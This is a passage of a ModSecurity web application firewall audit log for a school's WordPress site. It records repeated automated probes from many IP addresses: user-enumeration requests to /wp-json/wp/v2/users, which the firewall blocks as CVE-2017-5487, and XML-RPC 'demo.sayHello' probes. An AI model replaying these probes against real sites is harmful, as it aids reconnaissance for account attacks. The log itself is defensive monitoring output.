"HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746728384769246 5756 (- - -) Stopwatch2: 1746728384769246 5756; combined=4243, p1=523, p2=3435, p3=28, p4=30, p5=127, sr=73, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfbb0e5f-Z-- --ff634637-A-- [09/May/2025:01:22:35 +0700] aBz2a44K347NtBcwXKx0ywAAAIo 103.236.140.4 53614 103.236.140.4 8181 --ff634637-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.242.231.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ff634637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff634637-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746728555692235 3323 (- - -) Stopwatch2: 1746728555692235 3323; combined=1412, p1=471, p2=908, p3=0, p4=0, p5=32, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff634637-Z-- --d118a272-A-- [09/May/2025:01:32:39 +0700] aBz4x8P9GxxPAbCroFZCLgAAAEo 103.236.140.4 53672 103.236.140.4 8181 --d118a272-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 167.172.219.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 167.172.219.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d118a272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d118a272-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746729159535350 2906 (- - -) Stopwatch2: 1746729159535350 2906; combined=1283, p1=403, p2=845, p3=0, p4=0, p5=34, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d118a272-Z-- --350b2323-A-- [09/May/2025:01:46:25 +0700] aBz8AcP9GxxPAbCroFZCQAAAAEw 103.236.140.4 53744 103.236.140.4 8181 --350b2323-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 59.98.147.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 59.98.147.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --350b2323-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --350b2323-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746729985812670 3175 (- - -) Stopwatch2: 1746729985812670 3175; combined=1373, p1=486, p2=854, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --350b2323-Z-- --05c73102-A-- [09/May/2025:01:51:34 +0700] aBz9NsP9GxxPAbCroFZCQgAAAEI 103.236.140.4 53770 103.236.140.4 8181 --05c73102-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --05c73102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c73102-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730294986660 3152 (- - -) Stopwatch2: 1746730294986660 3152; combined=1365, p1=486, p2=847, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c73102-Z-- --0fff827a-A-- [09/May/2025:01:51:38 +0700] aBz9Oqcs1DvJ_HgMHE95oQAAABc 103.236.140.4 53774 103.236.140.4 8181 --0fff827a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fff827a-C-- demo.sayHello --0fff827a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fff827a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730298731727 5465 (- - -) Stopwatch2: 1746730298731727 5465; combined=4181, p1=538, p2=3417, p3=41, p4=31, p5=91, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fff827a-Z-- --3bcd6754-A-- [09/May/2025:01:52:12 +0700] aBz9XKcs1DvJ_HgMHE95owAAAAI 103.236.140.4 53780 103.236.140.4 8181 --3bcd6754-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3bcd6754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bcd6754-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730332032520 3053 (- - -) Stopwatch2: 1746730332032520 3053; combined=1348, p1=431, p2=882, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bcd6754-Z-- --dc516e42-A-- [09/May/2025:01:52:14 +0700] aBz9Xqcs1DvJ_HgMHE95pQAAABI 103.236.140.4 53784 103.236.140.4 8181 --dc516e42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc516e42-C-- demo.sayHello --dc516e42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc516e42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730334954343 4819 (- - -) Stopwatch2: 1746730334954343 4819; combined=3790, p1=435, p2=3139, p3=32, p4=32, p5=89, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc516e42-Z-- --e9769b5b-A-- [09/May/2025:01:52:55 +0700] aBz9h6cs1DvJ_HgMHE95qQAAABg 103.236.140.4 53794 103.236.140.4 8181 --e9769b5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9769b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9769b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730375440555 3173 (- - -) Stopwatch2: 1746730375440555 3173; combined=1349, p1=464, p2=853, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9769b5b-Z-- --0b65940e-A-- [09/May/2025:01:52:58 +0700] aBz9iqcs1DvJ_HgMHE95qwAAAAs 103.236.140.4 53798 103.236.140.4 8181 --0b65940e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b65940e-C-- demo.sayHello --0b65940e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b65940e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730378399532 5273 (- - -) Stopwatch2: 1746730378399532 5273; combined=3940, p1=504, p2=3222, p3=29, p4=32, p5=90, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b65940e-Z-- --b6fa7311-A-- [09/May/2025:01:53:26 +0700] aBz9pqcs1DvJ_HgMHE95rQAAAA8 103.236.140.4 53804 103.236.140.4 8181 --b6fa7311-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6fa7311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6fa7311-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730406807849 2935 (- - -) Stopwatch2: 1746730406807849 2935; combined=1326, p1=464, p2=830, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6fa7311-Z-- --c096fa58-A-- [09/May/2025:01:53:30 +0700] aBz9qqcs1DvJ_HgMHE95rwAAABA 103.236.140.4 53808 103.236.140.4 8181 --c096fa58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c096fa58-C-- demo.sayHello --c096fa58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c096fa58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730410057821 4547 (- - -) Stopwatch2: 1746730410057821 4547; combined=3609, p1=462, p2=2946, p3=25, p4=22, p5=90, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c096fa58-Z-- --519f0976-A-- [09/May/2025:01:53:42 +0700] aBz9tqcs1DvJ_HgMHE95tAAAAAA 103.236.140.4 53822 103.236.140.4 8181 --519f0976-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --519f0976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --519f0976-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730422991140 2636 (- - -) Stopwatch2: 1746730422991140 2636; combined=1410, p1=455, p2=917, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --519f0976-Z-- --965fa210-A-- [09/May/2025:01:53:46 +0700] aBz9uqcs1DvJ_HgMHE95tgAAAAc 103.236.140.4 53826 103.236.140.4 8181 --965fa210-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --965fa210-C-- demo.sayHello --965fa210-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --965fa210-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730426571599 6278 (- - -) Stopwatch2: 1746730426571599 6278; combined=4503, p1=590, p2=3646, p3=64, p4=40, p5=98, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --965fa210-Z-- --09afac62-A-- [09/May/2025:01:54:02 +0700] aBz9yqcs1DvJ_HgMHE95uAAAAAM 103.236.140.4 53836 103.236.140.4 8181 --09afac62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09afac62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09afac62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730442324509 12597 (- - -) Stopwatch2: 1746730442324509 12597; combined=19801, p1=469, p2=926, p3=0, p4=0, p5=9222, sr=77, sw=0, l=0, gc=9184 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09afac62-Z-- --73d5e658-A-- [09/May/2025:01:54:05 +0700] aBz9zacs1DvJ_HgMHE95ugAAAA0 103.236.140.4 53840 103.236.140.4 8181 --73d5e658-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73d5e658-C-- demo.sayHello --73d5e658-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73d5e658-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746730445181281 5554 (- - -) Stopwatch2: 1746730445181281 5554; combined=4076, p1=493, p2=3361, p3=28, p4=32, p5=95, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73d5e658-Z-- --3375a52d-A-- [09/May/2025:01:57:45 +0700] aBz-qacs1DvJ_HgMHE95vwAAABA 103.236.140.4 53862 103.236.140.4 8181 --3375a52d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3375a52d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3375a52d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746730665933750 2800 (- - -) Stopwatch2: 1746730665933750 2800; combined=1347, p1=451, p2=866, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3375a52d-Z-- --4a844c66-A-- [09/May/2025:01:57:49 +0700] aBz-racs1DvJ_HgMHE95wQAAABM 103.236.140.4 53870 103.236.140.4 8181 --4a844c66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a844c66-C-- demo.sayHello --4a844c66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a844c66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 